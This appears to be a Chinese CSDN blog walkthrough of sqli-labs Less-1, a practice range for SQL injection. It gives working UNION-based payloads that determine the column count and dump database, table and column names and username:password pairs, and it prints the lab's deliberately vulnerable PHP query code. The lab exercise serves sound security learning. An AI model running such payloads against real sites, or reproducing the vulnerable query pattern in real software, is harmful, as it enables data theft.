sqli-labs靶场Less-1极其详细练习过程

已于 2023-03-09 23:23:43 修改
阅读量486 收藏 2
点赞数 4
文章标签: 安全
于 2023-03-09 23:22:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51782199/article/details/129432649
版权

Less-1

一、分析题目

提示为将ID作为带数值的参数输入。

Get请求有如下特性:它会将数据添加到URL中,通过这种方式传递到服务器,通常利用一个问号?代表URL地址的结尾与数据参数的开端,后面的参数每一个数据参数以“名称=值”的形式出现,参数与参数之间利用一个连接符&来区分。

这里先输入一个?id=1

1、判断SQL注入是整型还是字符型。

常用方法:

    这里我们输入 ?id=1 and1=1  和  ?id=1 and 1=2显示页面和原来一样,说明不是整型。

加反斜杠,出现报错,

注意反斜杠后面的即为闭合方式

分析:

"1\' LIMIT 0,1'  外层单引号去掉为 '1\'LINIT 0,1   1\为输入的内容,所以为单引号闭合

或者加 )' 看报错,一层一层剥析

同理分析:

"1)" LIMIT O, 1' 去掉最外层单引号  '1)''LIMIT 0,1      1)’为输入的内容,所以为单引号闭合

注释方式:--+   --(空格)  # (这里用--+)

?id=1' and 1=1 --+

sql语句:select * from users where id=’1‘ and 1=1 --+’ limit 0,1

2、判断字段数

order by 10 对要查询表的第10个字段(第10列)进行排序(升序),用于判断字段数(报错即为没有那么多字段)。

报错,说明没有10个字段,最终测试发现总字段数为3。

3、union select判断回显点

id=1.3' union select 1,2,3--+

id=1.3或者随便等于一个不存在的,id=99999或者id=-1等,这样做的目的是为了不显示前面所查询的内容,显示后面的内容。

注意:union前面内容一定要让它报错,如果前面正确直接执行前面,占据页面,不显示后面内容

确定回显字段为2,3字段后,接下来利用回显点查询我们想查询的内容。

4、爆信息

爆库

?id=1.3' union select 1,database(),3--+
?id=-1' union select 1,2, group_concat(schema_name) from information_schema.schemata  --+

爆表

table_schema是数据库的名称

table_name是具体的表名,

table_type指的是表的类型

information_schema.tables表示information_schema中tables该表。

tables中有table_name字段。

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查到 emails,referers,uagents,users ,显然users是用户数据表

爆字段

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

union select 1,2,group_concat(username,0x3a,password) from ctfshow_user--+

  0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

二、分析PHP

打开Less-1的php文件,对其分析。

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");    #sql-connect.php该php文件连接mysql数据库,
error_reporting(0);                               #关闭错误报告 
// take the variables 
if(isset($_GET['id']))         #isset()函数判断是否为NULL,如果不为null则为true,才执行if内容
{                              #_GET用于收集来自 method="get" 的表单中的值。从带有 GET 方法的表                                   单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏)
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);             #执行一条mysql查询
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());          mysql_error()返回上一个Mysql操作产生的文本错误信息
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

添砖《java》
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场——sqli-lab 1-4
ad12456的博客
04-11 1522
sqli_lab
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1399
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL注入
2301_78612169的博客
01-28 542
一、判断是注入点的类型一、判断是注入点的类型1、单引号测试在id=1后面加上闭合符号 ' , 如果报错,则在后面加上--+将后面注释掉,如报不报错,则证明为字符型id=1' -- +
sqli-labs漏洞靶场~SQL注入(全网最全详解)
最新发布
weixin_67832625的博客
08-11 1259
本文主要对sqli-labs靶场过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
sqli-labs练习——sql注入
haoaaao的博客
01-29 1471
/*** 环境搭建 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/122668696 ***/ 一、less-1 (1)题目让提交一个参数,没说是get参数还是post参数,那先尝试一下get参数 (2)首先触发网站的异常,如果触发异常了,说明网站存在sql注入漏洞,甚至可以通过报错信息,获取数据库的一些信息。 1)可以通过特殊字符进行尝试 (空格、#号需要url转义) 报如下异常 ...
sqli-labs练习(十五、十六)
wkend的博客
07-27 1474
sqli-labs练习(十五)— POST-Bind-Boolean/time Based-Single quotes 同样,使用万能码即可登录成功,进过几次注入尝试发现是基于布尔型的盲注。 万能码:123' or 1=1#,即可登录成功。 基于布尔型的sql注入稍微麻烦,因为要不断的测试,根据页面的反应来猜测后台数据库信息。 下面直接放payload:uname=1' or (s...
sqli-labs靶场分析
RestoreJustice的博客
03-18 2455
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
sqli-labs练习(十)--- GET-Blind-Time based-double quotes
wkend的博客
07-25 315
payload:id=1, 通过几次尝试,可以发现,这是一个基于时间的盲注, payload:id=1' and sleep(5)%23,时间并没有延迟5秒,说明不是单引号的闭合 payload:id=1&quot; and sleep(5)%23,页面发生延迟,说明是双引号的闭合 payload:id=1&quot; and if(ascii(substr(database(),1,1))=...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1827
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 704
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 706
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sql的学习以及sqli-lab靶场练习
RealIiikun的博客
03-07 643
sqlilab靶场练习
靶场sqli-labs的练习笔记(基础知识)第一章
m0_55314368的博客
06-13 254
在获得了数据库名称之后我们来查询表名,表名又有很多种,刚才爆出了emails、referers,uagents,user这些表名,通常我们需要拿到一些敏感数据的时候,我们首先会对user表中的数据感兴趣,先进入user中查看。加入联合语句,查看没有变换,那么已知id=1是正确的,所有后面才有可能不显示,尝试修改让前面的信息报错id=-1,并且判断闭合方式为id=1'这段语句的作用是查询table_schma=当前数据库名称的,刚才根据SQL注入点报错,我们可以得到database()=security。
sqli-lab靶场搭建
port_66666的博客
08-27 323
小白看教程来着,教程里要用到sqli-lab这个靶场,寻思自己搭一个 sqli-lab下载地址:github.com/Audi-1/sqli-labs 一、环境搭建: 我直接用的小皮 也就是phpstudy 有一个地方要注意,因为这个sqli-lab的php版本比较老,有些语法可能不兼容 解决方法我知道的有两个: 1.修改PHP的版本 推荐php5.2.17版本,找不到可以自己在这里下载 2.修改PHP代码 因为7以上的版本mysql_**都改成了mysqli_** 建议..
Sqli-Labs靶场(6--10)题详解
weixin_46099095的博客
03-11 2312
六、Less-6:GET - Double Injection - Double Quotes - string(GET - 双重注入 - 双引号 - 字符串) 此题解法与Less-5类似 只需判断注入点时使用?id=1"-- + 附上Less1-Less5题解 https://blog.csdn.net/weixin_46099095/article/details/123399846?spm=1001.2014.3001.5502 七、Less-7:GET - Dump into outfil
sqli-labs靶场实战
u011417723的博客
03-08 2735
靶场实战
Sqli-Lab靶场-进阶篇笔记
Pr0m1se1n的博客
03-22 699
Sqli-Lab靶场进阶篇笔记
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 5875
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的各种类型和利用方法。 首先,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值